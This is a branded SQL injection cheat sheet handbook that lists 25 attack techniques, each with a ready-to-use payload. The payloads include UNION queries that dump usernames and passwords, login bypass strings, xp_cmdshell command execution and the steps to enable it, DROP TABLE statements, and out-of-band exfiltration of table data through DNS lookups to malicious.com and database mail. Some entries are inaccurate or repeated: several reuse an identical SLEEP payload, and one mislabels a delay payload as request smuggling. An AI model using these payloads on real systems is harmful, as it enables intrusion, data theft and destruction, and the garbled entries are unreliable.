sql

injection
cheat
sheet
handbook
When Database Gates Are Left Ajar,
Chaos Writes Its Own Code

VIEH GROUP
 SQL INJECTION CHEAT SHEET HANDBOOK

1. Union-Based SQL Injection:

description:
Used to retrieve data from other tables by injecting a
`UNION SELECT` statement into an existing SQL
query.

p
payload:

u
' UNION SELECT null, username, password FROM users --
tactics:

o
Identify the number of columns in the target query.

r
Use `ORDER BY` clause to determine the type of

g
columns (numeric or string).

h
Craft the `UNION SELECT` payload accordingly.

e
2. Error-Based SQL Injection:

i
description:

v
Exploits SQL errors to extract information about the
database.

@
payload:
' OR 1=CONVERT(int, (SELECT @@version)) --
tactics:
Inject payloads to trigger SQL errors.
Gather information from error messages, such as
version details.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com

 SQL INJECTION CHEAT SHEET HANDBOOK

3. Blind SQL Injection (Boolean-

Based):
description:
Exploits the application without direct feedback.

p
Boolean-based technique makes decisions based on
true/false conditions.

u
payload:

o
' OR IF(1=1, SLEEP(5), 0) --

r
tactics:

g
Observe application behavior for delays or changes in
response time.

h
Adjust the payload for true and false conditions.

ie
4. Time-Based Blind SQL Injection:

v
description:
Delays the response to determine the truth of a

@
statement.
payload:
' OR IF(1=1, SLEEP(5), 0) --
tactics:
Observe delays in the application's response time.
Adjust the payload for different sleep durations.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com

 SQL INJECTION CHEAT SHEET HANDBOOK

5. Out-of-Band SQL Injection (DNS

Exfiltration):
description:
Utilizes a different communication channel (e.g., DNS) to

p
exfiltrate data.
payload:

u
'; EXEC xp_cmdshell('nslookup malicious.com') --

o
tactics:

r
Requires the ability to execute commands on the

g
underlying system.
Monitor external systems for DNS requests.

eh
i
6. Second-Order SQL Injection:

v
description:
Injects malicious payloads stored for later execution.

@
payload:
'); DROP TABLE users; --
tactics:
Payload is stored and executed at a later stage in the
application.
Requires analysis of the application flow.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com

 SQL INJECTION CHEAT SHEET HANDBOOK

7. Exploiting Authentication:
description:
Used to bypass login mechanisms by injecting SQL
statements.
payload:

p
' OR '1'='1' --

u
tactics:
Used to manipulate the WHERE clause in login forms.

o
Bypass authentication and gain unauthorized access.

gr
8. Time-Based Blind SQL Injection

h
for Authentication Bypass:

e
i
description:

v
Delays authentication processes using time-based
injections.

@
payload:
' OR IF(1=1, SLEEP(5), 0) --
tactics:
Observe delays during authentication attempts.
Allows for bypassing login mechanisms.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com

 SQL INJECTION CHEAT SHEET HANDBOOK

9. Command Execution:
description:
Executes arbitrary commands on the underlying server.
payload:
'; EXEC xp_cmdshell('whoami') --

p
tactics:

u
Requires the ability to execute commands.
Can lead to full system compromise.

ro
g
10. Time-Based Blind SQL Injection

h
for Data Extraction:

e
i
description:

v
Delays SQL queries to infer the existence of data.
payload:

@
' OR IF(1=1, SLEEP(5), 0) --
tactics:
Observe delays in responses to infer true conditions.
Use this to extract data character by character.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com

 SQL INJECTION CHEAT SHEET HANDBOOK

11. Boolean-Based Blind SQL

Injection for Data Extraction:
description:
Extracts data using true/false conditions.

p
payload:
' OR IF(1=1, column_value, 0) --

u
tactics:

o
Utilize conditions to extract data character by character.

r
Observe changes in application behavior.

hg
12. Error-Based SQL Injection for
Data Extraction:
description:

ie
v
Exploits SQL errors to extract data.
payload:

@
' OR 1=CONVERT(int, (SELECT column_value FROM
sensitive_data)) --
tactics:
Inject payloads to provoke errors that reveal sensitive
data.
Extract data using error messages.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com

 SQL INJECTION CHEAT SHEET HANDBOOK

13. UNION-Based SQL Injection for

Multiple Columns:
description:
Expands the UNION query to extract data from multiple

p
columns.
payload:

u
' UNION SELECT column1, column2 FROM another_table --

o
tactics:

r
Identify the number of columns and types in the target

g
query.
Extend the `UNION SELECT` statement accordingly.

eh
14. Time-Based Blind SQL Injection

v
description:i
for Boolean Conditions:

@
Combines time-based and boolean-based techniques
for nuanced exploitation.
payload:
' OR IF(1=1, SLEEP(5), IF(1=2, SLEEP(1), 0)) --
tactics:
Introduces a layered approach for more controlled
exploitation.
Adjust conditions and sleep durations accordingly.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com

 SQL INJECTION CHEAT SHEET HANDBOOK

15. Using SQL Server's `OPENROWSET`

for Command Execution:
description:
Exploits SQL Server's `OPENROWSET` function for

p
command execution.
payload:

u
'; EXEC sp_configure 'show advanced options', 1;

o
RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1;

r
RECONFIGURE; --
tactics:

g
Enables `xp_cmdshell` to execute arbitrary commands

h
on SQL Server.

ie
16. Advanced Out-of-Band SQL

v
Injection (HTTP Request Smuggling):
description:

@
Leverages HTTP Request Smuggling for data
exfiltration.
payload:
' OR 1=1; WAITFOR DELAY '0:0:5'; --
tactics:
Exploits discrepancies in how front-end and back-end
systems handle HTTP requests.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com

 SQL INJECTION CHEAT SHEET HANDBOOK

17. Out-of-Band SQL Injection (DNS

Exfiltration with Subdomains):
description:
Uses DNS exfiltration with dynamically generated

p
subdomains.
payload:

u
'; EXEC xp_cmdshell('nslookup ' + (SELECT column_value

o
FROM sensitive_data) + '.malicious.com') --

r
tactics:

g
Dynamically generates subdomains to exfiltrate data.

h
18. Time-Based Blind SQL Injection

ie
with Subqueries:

v
description:
Uses subqueries and time delays for data extraction.

@
payload:
' OR IF(1=1, (SELECT column_value FROM sensitive_data),
0) --
tactics:
Incorporates subqueries to fetch data.
Delays in responses help infer true conditions.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com

 SQL INJECTION CHEAT SHEET HANDBOOK

19. Error-Based SQL Injection with

XP_CMDShell Execution:
description:
Exploits SQL Server's `xp_cmdshell` for command
execution.

p
payload:
'; EXEC xp_cmdshell('whoami') --

u
tactics:

o
Executes arbitrary commands on the underlying system.

r
Requires enabling `xp_cmdshell` if not already

g
configured.

h
20. Boolean-Based Blind SQL

ie
Injection with Conditional

v
Responses:
description:

@
Exploits boolean conditions for data extraction.
payload:
' OR IF(1=1, (SELECT column_value FROM sensitive_data),
0) --
tactics:
Utilizes boolean conditions for controlled data
extraction.
Observe changes in responses for true and false
conditions.
Social Media: viehgroup www.viehgroup.com support@viehgroup.com
 SQL INJECTION CHEAT SHEET HANDBOOK

21. Advanced UNION-Based SQL

Injection with ORDER BY and NULLs:
description:
Exploits UNION-based injection with nuanced ORDER
BY and NULL handling.

p
payload:

u
' UNION SELECT null, column1, null FROM sensitive_data
ORDER BY 2 --

o
tactics:

r
Utilizes NULLs and ORDER BY clauses for proper

g
UNION injection.

h
Orders the result set to match the existing query
structure.

e
22. Blind SQL Injection with Bitwise
Operations:

v
description:i
@
Uses bitwise operations to infer information.
payload:
' OR 1=1; IF((SELECT ascii(substring((SELECT
column_value FROM sensitive_data), 1, 1))) & 65 = 65,
SLEEP(5), 0) --
tactics:
Utilizes bitwise operations to infer ASCII values
character by character.
Observe delays in responses for true conditions.
Social Media: viehgroup www.viehgroup.com support@viehgroup.com
 SQL INJECTION CHEAT SHEET HANDBOOK

23. Advanced Out-of-Band SQL

Injection (SMTP Exfiltration):
description:
Leverages SMTP for data exfiltration.
payload:

p
'; EXEC msdb.dbo.sp_send_dbmail
@profile_name='your_profile',@recipients='your_email@exa

u
mple.com',@body='Data: '+(SELECT column_value FROM

o
sensitive_data),@subject='SQL Injection'; --

r
tactics:
Sends data via SMTP emails.

g
Requires configuration of SQL Server's Database Mail.

h
24. Error-Based SQL Injection with

e
i
INFORMATION_SCHEMA:

v
description:
Extracts information from the database schema using

@
error-based injection.
payload:
' OR 1=(SELECT column_name FROM
INFORMATION_SCHEMA.COLUMNS WHERE
table_name='users') --
tactics:
Extracts information about column names.
Utilizes errors to reveal sensitive details.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com

 SQL INJECTION CHEAT SHEET HANDBOOK

25. Advanced UNION-Based SQL

Injection with Stacking Queries:
description:
Exploits UNION injection with stacked queries for
complex operations.

p
payload:
' UNION SELECT column1, column2 FROM another_table;

u
DROP TABLE target_table --

o
tactics:

r
Stacks queries to execute multiple operations.

g
Be cautious with destructive actions like `DROP
TABLE`.

h
---X---

ie
v
@
Social Media: viehgroup www.viehgroup.com support@viehgroup.com